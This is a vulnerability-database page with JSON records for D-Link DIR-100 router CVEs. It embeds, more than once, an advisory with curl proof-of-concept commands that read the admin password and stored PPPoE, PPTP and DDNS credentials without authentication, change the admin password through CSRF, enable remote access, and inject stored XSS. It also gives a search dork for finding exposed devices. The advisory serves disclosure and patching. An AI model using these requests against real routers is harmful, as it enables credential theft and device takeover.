\u0027http://192.168.0.1/cliget.cgi?cmd=$ddns1\u0027\n curl \u0027http://192.168.0.1/cliget.cgi?cmd=$poe_user\u0027\n curl \u0027http://192.168.0.1/cliget.cgi?cmd=$poe_pass\u0027\n curl \u0027http://192.168.0.1/cliget.cgi?cmd=$pptp_user\u0027\n curl \u0027http://192.168.0.1/cliget.cgi?cmd=$pptp_pass\u0027\n curl \u0027http://192.168.0.1/cliget.cgi?cmd=$log_mail_user\u0027\n curl \u0027http://192.168.0.1/cliget.cgi?cmd=$log_mail_pwd\u0027\n\n## 3.4 Cross-Site Request Forgery (CSRF)\n\n### Description\n\nCSRF attacks can be launched by sending a formatted request to a victim, then\ntricking the victim into loading the request (often automatically), which\nmakes it appear that the request came from the victim. As an example the\nattacker could change the administrator password (see Proof of Concept code)\nand enable system remote access. \n\n### Proof of Concept\n\nChanging the password for administrator can be done when the ip-address is\nauthenticated:\n\n # Log into DIR-100\n curl -X POST -d \u0027uname=admin\u0026pws=password\u0026login=Login\u0027 \u0027http://192.168.0.1/login.htm\u0027\n\n # Change password\n curl \u0027http://192.168.0.1/cli.cgi?cmd=$sys_user1=user=admin\u0026pass=c%;$sys_passHash=4%25;commit\u0027\n\n # enable remote console\n curl \u0027http://192.168.0.1/cli.cgi?cmd=$sys_remote_enable=1%25;$sys_remote_ip=0.0.0.0%25;$sys_remote_port=80%25;commit\u0027\n\n## 3.5 Cross-Site Scripting (XSS)\n\n### Description\n\nIt is possible for an authenticated user to store information on the server\nwhich will not be checked on the server side for special characters which\nresults in persistent Cross-Site Scripting Vulnerabilities. With this\nvulnerabilty the victim (administrator) will run javascript code in the \ncontext of the D-Link DIR-100. \n\nXSS is possible because only on the client side (javascript code) the input is\nfiltered and validated, sending data directly to the CGI scripts. \n\n### Proof of Concept\n\n # Log into DIR-100\n curl -X POST -d \u0027uname=admin\u0026pws=password\u0026login=Login\u0027 \u0027http://192.168.0.1/login.htm\u0027\n\n # XSS in Static IP Address Tab\n curl \u0027http://192.168.1.104/cli.cgi?cmd=dhcps%20set%20name=\u003cscript\u003ealert(1)\u003c/script\u003e%26ip=192.168.0.199%26mac=00:11:22:33:44:55%26flg=1%26exp=\u0027\n\n # XSS in Scheduler tab\n curl \u0027http://192.168.1.104/cli.cgi?cmd=$sched2=schen=1%26time=0-60%26day=5%26desc=\u003cscript\u003ealert(1)\u003c/script\u003e%26use=0%26idx=2%26;commit\u0027\n\n# 4 Severity and Remediation\n\nThis exploits are considered very critical, especially when the feature of remote\nadministration is activated on the system. \nWeak authentication, together with cross-site request forgery and authentication \nbypass can result in a full device compromise from an arbitrary website the victim is\naccessing, even if the device has remote administration deactivated on the\ninternet-port. It is recommended to upgrade the router with the newest firmware\nof the D-Link DIR-100. \n\n# 5 Timeline\n\n2013-09-13 - First Contact with D-Link Support\n2013-09-19 - Sent Report\n2013-10-14 - Request Status update, Response: Beta will be available mid October\n2013-12-02 - Vendor publishes Firmware Update \n2013-12-11 - Request CVE-IDs\n2013-12-18 - Publish the report\n",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-007143"
},
{
"db": "CNVD",
"id": "CNVD-2014-01477"
},
{
"db": "BID",
"id": "65290"
},
{
"db": "PACKETSTORM",
"id": "125041"
}
],
"trust": 1.62
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2013-7053",
"trust": 3.4
},
{
"db": "BID",
"id": "65290",
"trust": 2.5
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007143",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2014-01477",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202002-036",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "125041",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01477"
},
{
"db": "BID",
"id": "65290"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007143"
},
{
"db": "PACKETSTORM",
"id": "125041"
},
{
"db": "CNNVD",
"id": "CNNVD-202002-036"
},
{
"db": "NVD",
"id": "CVE-2013-7053"
}
]
},
"id": "VAR-202002-0668",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01477"
}
],
"trust": 1.6
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT",
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01477"
}
]
},
"last_update_date": "2024-11-23T21:36:11.585000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top\u00a0Page",
"trust": 0.8,
"url": "http://www.dlink.lt/en/"
},
{
"title": "Patch for D-Link DIR-100 Cross-Site Request Forgery Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/44083"
},
{
"title": "D-Link DIR-100 Fixes for cross-site request forgery vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=107308"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01477"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007143"
},
{
"db": "CNNVD",
"id": "CNNVD-202002-036"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-352",
"trust": 1.0
},
{
"problemtype": "Cross-site request forgery (CWE-352) [NVD Evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-007143"
},
{
"db": "NVD",
"id": "CVE-2013-7053"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/90905"
},
{
"trust": 2.3,
"url": "http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt"
},
{
"trust": 1.6,
"url": "https://www.securityfocus.com/bid/65290/info"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-7053"
},
{
"trust": 0.4,
"url": "http://more.dlink.de/sicherheit/news.html#news8"
},
{
"trust": 0.3,
"url": "http://www.dlink.com/"
},
{
"trust": 0.3,
"url": "http://seclists.org/fulldisclosure/2014/feb/4"
},
{
"trust": 0.1,
"url": "http://192.168.1.104/cli.cgi?cmd=help\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/cliget.cgi?cmd=$pptp_user\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/cliget.cgi?cmd=$pptp_pass\u0027"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-7052"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/cliget.cgi?cmd=$log_mail_user\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/cli.cgi?cmd=$sys_remote_enable=1%25;$sys_remote_ip=0.0.0.0%25;$sys_remote_port=80%25;commit\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/cliget.cgi?cmd=easysetup%20summary\u0027"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-7051"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/cliget.cgi?cmd=$log_mail_pwd\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.1.104/cli.cgi?cmd=$sched2=schen=1%26time=0-60%26day=5%26desc=\u003cscript\u003ealert(1)\u003c/script\u003e%26use=0%26idx=2%26;commit\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.1.104/cliget.cgi?cmd=help\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/cliget.cgi?cmd=$sys_user1\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/login.htm\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.1.104/cli.cgi?cmd=dhcps%20set%20name=\u003cscript\u003ealert(1)\u003c/script\u003e%26ip=192.168.0.199%26mac=00:11:22:33:44:55%26flg=1%26exp=\u0027"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-7055"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/cliget.cgi?cmd=$poe_user\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/cli.cgi?cmd=$sys_user1=user=admin\u0026pass=c%;$sys_passhash=4%25;commit\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/\u0027"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-7054"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/cliget.cgi?cmd=$poe_pass\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/cliget.cgi?cmd=$ddns1\u0027"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/cli.cgi?cmd=help\u0027"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01477"
},
{
"db": "BID",
"id": "65290"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007143"
},
{
"db": "PACKETSTORM",
"id": "125041"
},
{
"db": "CNNVD",
"id": "CNNVD-202002-036"
},
{
"db": "NVD",
"id": "CVE-2013-7053"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2014-01477"
},
{
"db": "BID",
"id": "65290"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007143"
},
{
"db": "PACKETSTORM",
"id": "125041"
},
{
"db": "CNNVD",
"id": "CNNVD-202002-036"
},
{
"db": "NVD",
"id": "CVE-2013-7053"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-03-06T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-01477"
},
{
"date": "2013-12-03T00:00:00",
"db": "BID",
"id": "65290"
},
{
"date": "2020-02-17T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-007143"
},
{
"date": "2014-02-03T23:36:22",
"db": "PACKETSTORM",
"id": "125041"
},
{
"date": "2020-02-04T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202002-036"
},
{
"date": "2020-02-04T14:15:11.777000",
"db": "NVD",
"id": "CVE-2013-7053"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-03-06T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-01477"
},
{
"date": "2013-12-03T00:00:00",
"db": "BID",
"id": "65290"
},
{
"date": "2020-02-17T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-007143"
},
{
"date": "2022-07-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202002-036"
},
{
"date": "2024-11-21T02:00:14.800000",
"db": "NVD",
"id": "CVE-2013-7053"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202002-036"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link DIR-100 Cross-Site Request Forgery Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01477"
},
{
"db": "CNNVD",
"id": "CNNVD-202002-036"
}
],
"trust": 1.2
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "cross-site request forgery",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202002-036"
}
],
"trust": 0.6
}
}
var-202002-0670
Vulnerability from variot
D-Link DIR-100 4.03B07 has PPTP and poe information disclosure. D-Link DIR-100 Contains a vulnerability related to insufficient protection of credentials.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. D-Link DIR-100 Ethernet Broadband Router is a broadband router device. The D-Link DIR-100 Ethernet Broadband Router fails to properly restrict special access to users, allowing remote attackers to exploit vulnerabilities without having to verify the submission request and obtain information such as PPTP, POE, and Dyndns username and password. D-Link DIR-100 is prone to the following security vulnerabilities: 1. An authentication-bypass vulnerability 2. Multiple information-disclosure vulnerabilities 3. A cross-site request-forgery vulnerability 4. A cross-site scripting vulnerability An attacker can exploit these issues to execute HTML and arbitrary script code in the browser of an unsuspecting user in the context of the affected device, steal cookie-based authentication credentials, bypass-authentication mechanism, gain access to potentially sensitive information. Other attacks are also possible. * Title: Router D-Link DIR-100 Multiple Vulnerabilities * Date: 2013-12-18 * Author: Felix Richter * Contact: root@euer.krebsco.de * Vulnerable Software: ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b07_ALL_de_20120410.zip * Patched Software: ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b13_ALL_de_20131011.zip * Report Version: 2.0 * Report URL: http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt * Vulnerable: D-Link DIR-100 * Hardware Revision: D1 * Software Version: 4.03B07 (from 2012-04-10) * CVE Numbers: * CWE-287 Authentication Issues: CVE-2013-7051 * CWE-255 Issues with Credential Management: CVE-2013-7052 * CWE-352 Cross-Site Request Forgery: CVE-2013-7053 * CWE-79 Cross-Site Scripting: CVE-2013-7054 * CWE-200 Information Disclosure: CVE-2013-7055 * Google Dork: "D-Link Systems" inurl:bsc_internet.htm D1 * State: Patched by Vendor * Link to Vendor Report: http://more.dlink.de/sicherheit/news.html#news8
Table of Contents
1. Background
2. Technical Description
4. Severity and Remediation
5. Timeline
1. Background
The DIR-100 is designed for easy and robust connectivity among heterogeneous standards-based network devices. Computers can communicate directly with this router for automatic opening and closing of UDP/TCP ports to take full advantage of the security provided without sacrificing functionality of on-line applications.
2 Vulnerability Description
Multiple vulnerabilities have been found in the D-Link DIR-100 Ethernet Broadband Router Revision D (and potentially other devices sharing the affected firmware) that could allow a remote attacker:
- Retrieve the Administrator password without authentication leading to authentication bypass [CWE-255]
- Retrieve sensitive configuration paramters like the pppoe username and password without authentication [CWE-200]
- Execute privileged Commands without authentication through a race condition leading to weak authentication enforcement [CWE-287]
- Sending formatted request to a victim which then will execute arbitrary commands on the device (CSRF) [CWE-352]
- Store arbitrary javascript code which will be executed when a victim accesses the administrator interface [CWE-79]
CVE-Numbers for these vulnerabilities has not yet been assigned.
3 Technical Description of the Vulnerabilities
3.0 The DIR-100 Web Interface and CGI
The DIR-100 Web interface provides a cgi-script on /cliget.cgi for
unauthenticated users and /cli.cgi for authenticated requests.
list of features provided by each cgi-script can be retrieved by:
curl 'http://192.168.1.104/cliget.cgi?cmd=help'
# and respectively when authenticated
curl 'http://192.168.1.104/cli.cgi?cmd=help'
3.1 Authentication Bypass
Description
The administrator password is not protected in any way on the device, every attacker with access to the administrator interface which listens on port 80. For retrieving the Administrator password the request must not be authenticated.
Proof of Concept
The web interface provides two distinct ways to retrieve the adminstrator password:
curl 'http://192.168.0.1/cliget.cgi?cmd=$sys_user1'
curl 'http://192.168.0.1/cliget.cgi?cmd=easysetup%20summary'
3.2 Weak Authentication
Description
As soon as a user is logged into the administration interface, the cli CGI
is unlocked and can be used by without authenticating before as
the cgi-script does not check any other authentication parameters such as
cookies or HTTP Parameters. The only access check is if the IP-Address is
the same.
Proof of Concept
# open the router interface in a web browser and log in
firefox 'http://192.168.0.1/'
# open a new terminal or another web-browser which is currently not logged
# in and try to access
curl 'http://192.168.0.1/cli.cgi?cmd=help'
# this request will be authenticated and it will not be redirected to the
# login page. If no user is logged in, the request will be redirected to
# the login
3.3 Retrieve sensitive information
Description
Besides retrieving the administrator password without authentication it is possible to retrieve other sensitive configuration from the device as well like the PPTP and poe Username and Password, as well as the configured dyndns username and password and configured mail log credentials when these parameters are configured. No authentication is requred.
Proof of Concept
curl 'http://192.168.0.1/cliget.cgi?cmd=$ddns1'
curl 'http://192.168.0.1/cliget.cgi?cmd=$poe_user'
curl 'http://192.168.0.1/cliget.cgi?cmd=$poe_pass'
curl 'http://192.168.0.1/cliget.cgi?cmd=$pptp_user'
curl 'http://192.168.0.1/cliget.cgi?cmd=$pptp_pass'
curl 'http://192.168.0.1/cliget.cgi?cmd=$log_mail_user'
curl 'http://192.168.0.1/cliget.cgi?cmd=$log_mail_pwd'
3.4 Cross-Site Request Forgery (CSRF)
Description
CSRF attacks can be launched by sending a formatted request to a victim, then tricking the victim into loading the request (often automatically), which makes it appear that the request came from the victim. As an example the attacker could change the administrator password (see Proof of Concept code) and enable system remote access.
Proof of Concept
Changing the password for administrator can be done when the ip-address is authenticated:
# Log into DIR-100
curl -X POST -d 'uname=admin&pws=password&login=Login' 'http://192.168.0.1/login.htm'
# Change password
curl 'http://192.168.0.1/cli.cgi?cmd=$sys_user1=user=admin&pass=c%;$sys_passHash=4%25;commit'
# enable remote console
curl 'http://192.168.0.1/cli.cgi?cmd=$sys_remote_enable=1%25;$sys_remote_ip=0.0.0.0%25;$sys_remote_port=80%25;commit'
3.5 Cross-Site Scripting (XSS)
Description
It is possible for an authenticated user to store information on the server which will not be checked on the server side for special characters which results in persistent Cross-Site Scripting Vulnerabilities. With this vulnerabilty the victim (administrator) will run javascript code in the context of the D-Link DIR-100.
XSS is possible because only on the client side (javascript code) the input is filtered and validated, sending data directly to the CGI scripts.
Proof of Concept
# Log into DIR-100
curl -X POST -d 'uname=admin&pws=password&login=Login' 'http://192.168.0.1/login.htm'
# XSS in Static IP Address Tab
curl 'http://192.168.1.104/cli.cgi?cmd=dhcps%20set%20name=<script>alert(1)</script>%26ip=192.168.0.199%26mac=00:11:22:33:44:55%26flg=1%26exp='
# XSS in Scheduler tab
curl 'http://192.168.1.104/cli.cgi?cmd=$sched2=schen=1%26time=0-60%26day=5%26desc=<script>alert(1)</script>%26use=0%26idx=2%26;commit'
4 Severity and Remediation
This exploits are considered very critical, especially when the feature of remote
administration is activated on the system.
Weak authentication, together with cross-site request forgery and authentication
bypass can result in a full device compromise from an arbitrary website the victim is
accessing, even if the device has remote administration deactivated on the
internet-port. It is recommended to upgrade the router with the newest firmware
of the D-Link DIR-100.
5 Timeline
2013-09-13 - First Contact with D-Link Support 2013-09-19 - Sent Report 2013-10-14 - Request Status update, Response: Beta will be available mid October 2013-12-02 - Vendor publishes Firmware Update 2013-12-11 - Request CVE-IDs 2013-12-18 - Publish the report
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202002-0670",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dir-100",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "4.03b07"
},
{
"model": "dir-100",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-100",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "dir-100 firmware 4.03b07"
},
{
"model": "dir-100 ethernet broadband router 4.03b07",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
},
{
"model": "dir-100 4.03b07",
"scope": null,
"trust": 0.3,
"vendor": "d link",
"version": null
},
{
"model": "dir-100 4.03b13",
"scope": "ne",
"trust": 0.3,
"vendor": "d link",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01479"
},
{
"db": "BID",
"id": "65290"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007144"
},
{
"db": "NVD",
"id": "CVE-2013-7055"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Felix Richter",
"sources": [
{
"db": "BID",
"id": "65290"
},
{
"db": "PACKETSTORM",
"id": "125041"
},
{
"db": "CNNVD",
"id": "CNNVD-202002-039"
}
],
"trust": 1.0
},
"cve": "CVE-2013-7055",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2013-7055",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.9,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 7.8,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2014-01479",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2013-7055",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2013-7055",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2013-7055",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "NVD",
"id": "CVE-2013-7055",
"trust": 0.8,
"value": "Critical"
},
{
"author": "CNVD",
"id": "CNVD-2014-01479",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-202002-039",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULMON",
"id": "CVE-2013-7055",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01479"
},
{
"db": "VULMON",
"id": "CVE-2013-7055"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007144"
},
{
"db": "CNNVD",
"id": "CNNVD-202002-039"
},
{
"db": "NVD",
"id": "CVE-2013-7055"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link DIR-100 4.03B07 has PPTP and poe information disclosure. D-Link DIR-100 Contains a vulnerability related to insufficient protection of credentials.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. D-Link DIR-100 Ethernet Broadband Router is a broadband router device. The D-Link DIR-100 Ethernet Broadband Router fails to properly restrict special access to users, allowing remote attackers to exploit vulnerabilities without having to verify the submission request and obtain information such as PPTP, POE, and Dyndns username and password. D-Link DIR-100 is prone to the following security vulnerabilities:\n1. An authentication-bypass vulnerability\n2. Multiple information-disclosure vulnerabilities\n3. A cross-site request-forgery vulnerability\n4. A cross-site scripting vulnerability\nAn attacker can exploit these issues to execute HTML and arbitrary script code in the browser of an unsuspecting user in the context of the affected device, steal cookie-based authentication credentials, bypass-authentication mechanism, gain access to potentially sensitive information. Other attacks are also possible. * Title: Router D-Link DIR-100 Multiple Vulnerabilities\n* Date: 2013-12-18\n* Author: Felix Richter\n* Contact: root@euer.krebsco.de\n* Vulnerable Software: ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b07_ALL_de_20120410.zip\n* Patched Software: ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b13_ALL_de_20131011.zip\n* Report Version: 2.0\n* Report URL: http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt\n* Vulnerable: D-Link DIR-100\n * Hardware Revision: D1\n * Software Version: 4.03B07 (from 2012-04-10)\n* CVE Numbers: \n * CWE-287 Authentication Issues: CVE-2013-7051\n * CWE-255 Issues with Credential Management: CVE-2013-7052\n * CWE-352 Cross-Site Request Forgery: CVE-2013-7053\n * CWE-79 Cross-Site Scripting: CVE-2013-7054\n * CWE-200 Information Disclosure: CVE-2013-7055\n* Google Dork: \"D-Link Systems\" inurl:bsc_internet.htm D1\n* State: Patched by Vendor\n* Link to Vendor Report: http://more.dlink.de/sicherheit/news.html#news8\n\n# Table of Contents\n\n 1. Background\n 2. Technical Description\n 4. Severity and Remediation\n 5. Timeline\n\n# 1. Background\n\nThe DIR-100 is designed for easy and robust connectivity among heterogeneous\nstandards-based network devices. Computers can communicate directly with this\nrouter for automatic opening and closing of UDP/TCP ports to take full\nadvantage of the security provided without sacrificing functionality of on-line\napplications. \n\n# 2 Vulnerability Description\n\nMultiple vulnerabilities have been found in the D-Link DIR-100 Ethernet\nBroadband Router Revision D (and potentially other devices sharing the \naffected firmware) that could allow a remote attacker:\n\n - Retrieve the Administrator password without authentication leading to\n authentication bypass [CWE-255]\n - Retrieve sensitive configuration paramters like the pppoe username and\n password without authentication [CWE-200]\n - Execute privileged Commands without authentication through a race\n condition leading to weak authentication enforcement [CWE-287]\n - Sending formatted request to a victim which then will execute arbitrary\n commands on the device (CSRF) [CWE-352]\n - Store arbitrary javascript code which will be executed when a victim\n accesses the administrator interface [CWE-79]\n\nCVE-Numbers for these vulnerabilities has not yet been assigned. \n\n# 3 Technical Description of the Vulnerabilities\n\n## 3.0 The DIR-100 Web Interface and CGI\n\nThe DIR-100 Web interface provides a cgi-script on `/cliget.cgi` for\nunauthenticated users and `/cli.cgi` for authenticated requests. \n\nlist of features provided by each cgi-script can be retrieved by:\n\n curl 